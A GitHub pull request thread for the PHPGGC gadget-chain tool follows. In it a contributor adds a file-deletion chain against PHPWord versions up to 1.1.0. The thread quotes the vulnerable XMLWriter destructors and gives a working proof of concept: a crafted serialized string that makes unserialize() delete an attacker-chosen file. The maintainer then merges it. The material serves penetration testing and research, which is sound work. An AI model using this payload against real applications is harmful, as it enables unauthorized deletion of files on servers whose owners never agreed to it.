ambionics / phpggc

PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
https://ambionics.io/blog
Apache License 2.0
3.23k stars 497 forks source link

PHPWord: Added FD/1, which targets PHPWord versions <= 1.1.0 #153

Closed therealcoiffeur closed 1 year ago

therealcoiffeur commented 1 year ago

I would like to add my PHPWord gadget chain to PHPGGC.

A pure PHP library for reading and writing word processing documents.

Why?

Below is the responsible code.

File: src/PhpWord/Shared/XMLWriter.php
Version: Commit <= 77438025265482ddcf050bce520d3c2b51645108

<?php

...

namespace PhpOffice\PhpWord\Shared;

use Exception;
use ReturnTypeWillChange;

...

class XMLWriter extends \XMLWriter
{
    /** Temporary storage method */
    const STORAGE_MEMORY = 1;
    const STORAGE_DISK = 2;

    /**
     * Temporary filename.
     *
     * @var string
     */
    private $tempFileName = '';

    ...

    /**
     * Destructor.
     */
    public function __destruct()
    {
        // Unlink temporary files
        if (empty($this->tempFileName)) {
            return;
        }
        if (PHP_OS != 'WINNT' && @unlink($this->tempFileName) === false) {
            throw new Exception('The file ' . $this->tempFileName . ' could not be deleted.');
        }
    }

    ...

}

File: src/PhpWord/Shared/XMLWriter.php
Version: Commit <= f359825cb7abdd0e92fa333237cb37d160504448

<?php

...

namespace PhpOffice\PhpWord\Shared;

use PhpOffice\PhpWord\Settings;

...

class XMLWriter
{

    /** Temporary storage location */
    const STORAGE_MEMORY = 1;
    const STORAGE_DISK = 2;

    /**
     * Internal XMLWriter
     *
     * @var \XMLWriter
     */
    private $xmlWriter;

    /**
     * Temporary filename
     *
     * @var string
     */
    private $tempFile = '';

    ...

    /**
     * Destructor
     */
    public function __destruct()
    {
        // Destruct XMLWriter
        unset($this->xmlWriter);

        // Unlink temporary files
        if ($this->tempFile != '') {
            @unlink($this->tempFile);
        }
    }

    ...

}

File: src/PhpWord/Shared/XMLWriter.php
Version: Commit <= 07be5eaea326a43fe0c68b6231c4a74e9639dd99

<?php

...

namespace PhpOffice\PhpWord\Shared;

use PhpOffice\PhpWord\Settings;

...

class XMLWriter
{

    /** Temporary storage method */
    const STORAGE_MEMORY = 1;
    const STORAGE_DISK = 2;

    /**
     * Internal XMLWriter
     *
     * @var \XMLWriter
     */
    private $_xmlWriter;

    /**
     * Temporary filename
     *
     * @var string
     */
    private $_tempFileName = '';

    ...

    /**
     * Destructor
     */
    public function __destruct()
    {
        // Desctruct XMLWriter
        unset($this->_xmlWriter);

        // Unlink temporary files
        if ($this->_tempFileName != '') {
            @unlink($this->_tempFileName);
        }
    }

    ...

}

How?

Proof Of Concept

$ git clone https://github.com/PHPOffice/PHPWord.git
$ cd PHPWord
$ php composer.phar install

Then we create the file test.php as follows.

File: test.php

<?php

require_once 'bootstrap.php';

$s = 'a:2:{i:7;O:34:"PhpOffice\PhpWord\Shared\XMLWriter":1:{s:12:"tempFileName";s:9:"/tmp/AAAA";}i:7;i:7;}';
$o = unserialize($s);

?>
cfreal commented 1 year ago

Thanks ! Pushed !